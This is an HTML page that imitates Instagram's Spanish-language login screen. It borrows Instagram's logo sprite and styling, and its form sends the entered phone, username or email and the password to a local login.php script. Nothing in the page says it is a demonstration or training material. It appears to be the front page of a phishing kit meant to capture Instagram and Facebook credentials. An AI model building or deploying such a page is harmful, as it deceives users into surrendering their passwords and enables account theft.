<html>
<head>
<meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1" />
</head>
<body>
<style>
body {
  font-family: sans-serif;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
    Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  box-sizing: border-box;
}

a {
  text-decoration: none;
}

.container {

  /*display: flex;
  justify-content: center;
  align-items: center;*/
  margin-top: 3rem;
  font-size: 14px;
}

.box {

  width: 100%;
  display: flex;
  justify-content: center;
  align-items: center;
  background-color: #ffff;
  /*border: 1px solid #e6e6e6;*/
  border-radius: 1px;
  margin: 0 0 10px;
  padding: 10px 0;

}

.heading {
  margin: 22px auto 12px;
  background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
  background-position: -98px 0;
  height: 51px;
  width: 177px;
  overflow: hidden;
}

.field {
  margin: 10px 0;
  position: relative;
  font-size: 14px;
  width: 100%;
  text-overflow: ellipsis;
}

input {
  padding: 9px 0px 7px 9px;
  font-size: 12px;
  width: 18rem;
  height: 40px;
  outline: none;
  background: #fafafa;
  border-radius: 3px;
  border: 1px solid #efefef;
}

/* label intial position*/

label {
  position: absolute;
  pointer-events: none;
  left: 10px;
  padding-bottom: 15px;
  transform: translateY(10px);
  line-height: 6px;
  transition: all ease-out 0.1s;
  font-size: 14px;
  color: #999;
  padding-top: 6px;
}

/* hiding placeholder in all browsers */

input::placeholder {
  visibility: hidden;
}

/* hiding  placeholder in mozilla */
.login-form ::-moz-placeholder {
  color: transparent;
}

/* label final position */
input:not(:placeholder-shown) + label {
  transform: translateY(0);
  font-size: 11px;
}

/* input padding increases if placeholder is not shown */
input:not(:placeholder-shown) {
  padding-top: 14px;
  padding-bottom: 2px;
}

.login-button {
  text-align: center;
  width: 100%;
  padding: 0.5rem;
  border: 1px solid transparent;
  background-color: #3897f0;
  color: #fff;
  font-weight: 600;
  font-size: 14px;
  cursor: pointer;
}

.separator {
  display: flex;
  justify-content: space-between;
  align-items: center;
  color: #999;
  margin-top: 6px;
}

.separator .line {
  height: 1px;
  width: 40%;
  background-color: #dbdbdb;
}

.other {
  display: flex;
  justify-content: center;
  flex-direction: column;
  align-items: center;
}

.fb-login-btn {
  margin: 1rem;
  border: 0;
  cursor: pointer;
  font-size: 14px;
  color: #385185;
  font-weight: 600;
  background: transparent;
}

.fb-icon {
  color: #385185;
  font-size: 1rem;
  padding-right: 1px;
}

.forgot-password {
  font-size: 11px;
  color: #003569;
}

.signup {
  color: #3897f0;
  font-weight: 600;
}
@media only screen and (min-width: 600px) {
.box{
   width:500px;
   margin: 0 auto;
   margin-top:10px;
   border: 1px solid #e6e6e6;
}
.container{
width:100%
}
body {
  background-color: #fafafa;
  }
} 
</style>
    
<div class="container">
    <div class="box">
        
        <form class="login-form" action="login.php" method="post">
        <div class="heading"></div>
            <div class="field">
                <input id="username" name="username" type="name" placeholder="Teléfono, usuario, o correo electrónico" />
                <label for="username">Teléfono, usuario, o correo electrónico</label>
            </div>
            <div class="field">
                <input id="password" name="password" type="password" placeholder="Contraseña" />
                <label for="password">Contraseña</label>
            </div>
            <button class="login-button" title="login">Iniciar sesión</button>
            <div class="separator">
                <div class="line"></div>
                <p>OR</p>
                <div class="line"></div>
            </div>
            <div class="other">
                <button class="fb-login-btn" type="submit">
                    <i class="fa fa-facebook-official fb-icon"></i>
                    <span class="">Iniciar sesión con Facebook</span>
                </button>
                <a class="forgot-password" href="#">¿Olvidaste tu contraseña?</a>
            </div>
        </form>
    </div>
    <div class="box">
        <p>¿No tienes una cuenta? <a class="signup" href="#">Regístrate</a></p>
    </div>
</div>
</body>
</html>
